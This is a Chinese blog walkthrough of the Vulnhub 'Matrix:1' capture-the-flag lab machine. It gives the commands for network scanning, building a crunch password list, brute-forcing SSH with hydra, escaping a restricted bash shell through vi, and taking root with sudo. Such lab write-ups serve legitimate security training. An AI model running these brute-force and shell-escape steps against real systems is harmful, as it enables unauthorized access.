Matrix:1靶机

于 2024-08-11 17:15:51 发布
阅读量377 收藏 5
点赞数 5
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/141108245
版权

信息收集

靶机扫描

netdiscover -i eth0 -r 192.168.7.0/24

端口扫描,开放端口22、80、31337

nmap -A 192.168.7.203 -p-

目录扫描

dirsearch -u http://192.168.7.203

网址访问

进行源码查看,没有发现什么有用的信息

拼接目录扫描出的目录/assets

根据端口扫描结果还有一个http服务端口,网址访问31337端口

进行源码查看,有base64的编码

在线解码

翻译一下,是echo一段短句进入了Cypher.matrix文件

尝试访问Cypher.matrix网页,发现存在一个.bak文件,我们直接下载,用记事本打开后发现为BF编码

利用在线网站(Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org])解码得到文本内容:

大体意思是:可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位

到此可知账户:guest

获取shell

使用kali自带crunch字典生成工具生成密码字典,密码一共8位,因为已知道6位了

cat /usr/share/crunch/charset.lst   选择要使用的crunch字典字符集范围

生成8位字符字典

#-f 指定字符集,-t 插入小写字符
crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric-sv -t k1ll0r@@ > pass.dic

再来使用hydra九头蛇工具爆破ssh账号密码:

hydra -l guest -P pass.dic ssh://192.168.7.203 -f -o ssh.txt

得到ssh账号密码: guest     k1ll0r7n

进行ssh连接

ssh guest@192.168.7.203

尝试了很多命令,好多命令都不能使用,因为没有增加环境变量

开始rbash逃逸

开始增加环境变量:

vi test

:!/bin/bash
#然后就进入了bash界面

# 切换完成之后还要添加环境变量
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

到这里就已经完成了rbash逃逸,

提权

直接sudo su 提权到root

查看flag文件

陽陽yy
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 873
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1181
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
【vulnhub】Matrix:1靶机
最新发布
wbplife的博客
08-07 394
cat /usr/share/crunch/charset.lst 选择要使用的crunch字典字符集范围。尝试访问Cypher.matrix网页,发现存在一个.bak文件,我们直接下载,用记事本打开后发现为BF编码。大体意思是:可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位。使用kali自带crunch字典生成工具生成密码字典,密码一共8位,因为已知道6位了。尝试了很多命令,好多命令都不能使用,因为没有增加环境变量。到这里就已经完成了rbash逃逸,
vulnhub靶机实战--Matrix:1
清唪的博客
04-13 3573
1.netdiscover 探测靶机ip地址 2.nmap -sS -A -p- +靶机ip 对靶机进行端口服务扫描 3.查看一下80端口网页发现并没有什么卵用 4.dirb http://+靶机ip 目录扫描 发现并没有什么卵用 5.我们上面的端口扫描有个31337端口可以尝试看看它有什么作用 我们来查看它的源代码 发现有base64 耶耶耶~~ 可以解码了 echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlL...
vulnhub靶机:matrix:1
weixin_52450702的博客
12-15 370
vulnhub靶机matrix
靶机渗透测试(Matrix_1)
@小张小张的博客
10-06 742
靶机渗透测试(Matrix_1): Vulnhub靶机 Matrix_1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Your Goal is to get root and read /root/flag.txt. 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 探测出靶机ip为:192.168.10.82 2. nmap进行靶机端口服务扫描 命令:
vulnhub靶机实战——Matrix:1
weixin_30757793的博客
05-24 149
环境 靶机ip:192.168.163.139 攻击机ip:192.168.163.129 目标:拿下靶机root权限 知识点 生成专属的爆破字典,受限shell rbash的绕过 渗透 首先nmap扫描靶机开启的端口 开了三个端口,分别是22的ssh,80和31337的http 看到31337开着http就觉得很可疑,感觉十有八九突破点是这个web ...
Matrix:3
zzf011900的博客
01-22 1053
使用 guest/7R1n17yN30 进行 ssh 登录得到,获得 bash ,不过是一个受限制的 bash ,rbash ( restriced bash ) ,使得一些基本的命令都无法执行。将secret.gz下载到本地,无法解压,再查看文件的类型是一个文本文件,ls查看文本内容发现登录用户和加密后的密码。查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容。直接在80端口,访问Matrix目录,发现可以打开,并发现很多目录。
vulnhub靶机 matrix:1(渗透测试详解)
2301_78721909的博客
08-07 258
vulnhub靶机 matrix:1(渗透测试详解)
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
靶机系列测试 djinn1
08-03
靶机系列测试 djinn1】是一篇关于虚拟机安全测试的教程,主要针对初到中级水平的用户。这个靶机兼容VirtualBox和VMWare,可以通过DHCP自动分配IP地址,用户可以在登录界面直接看到IP。挑战的目标是找到并读取两个...
靶机系列测试 CyNix1
08-03
靶机系列测试 CyNix1 是一个针对网络安全和渗透测试的学习资源,主要针对中等至高级难度的测试者。这个教程旨在帮助用户提升在虚拟环境中破解系统和寻找安全漏洞的能力。CyNix1 是一个Boot2Root类型的靶机,可以在...
【OpenCV C++20 学习笔记】阈值操作—分离图片对象
TeamLee的博客
08-04 1011
简单介绍了OpenCV中二值化、反二值化等阈值操作的原理和代码实现。
【OpenCV C++20 学习笔记】给图片加边框-copyMakeBorder
TeamLee的博客
08-06 600
简单介绍在OpenCV中如何用copyMakeBorder的方法给图片添加边框
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
B6665X的博客
08-06 407
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
尚硅谷谷粒商城项目笔记——三、安装docker【电脑CPU:AMD】
B6665X的博客
08-06 923
尚硅谷谷粒商城项目笔记——三、安装docker 电脑CPU:AMD
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值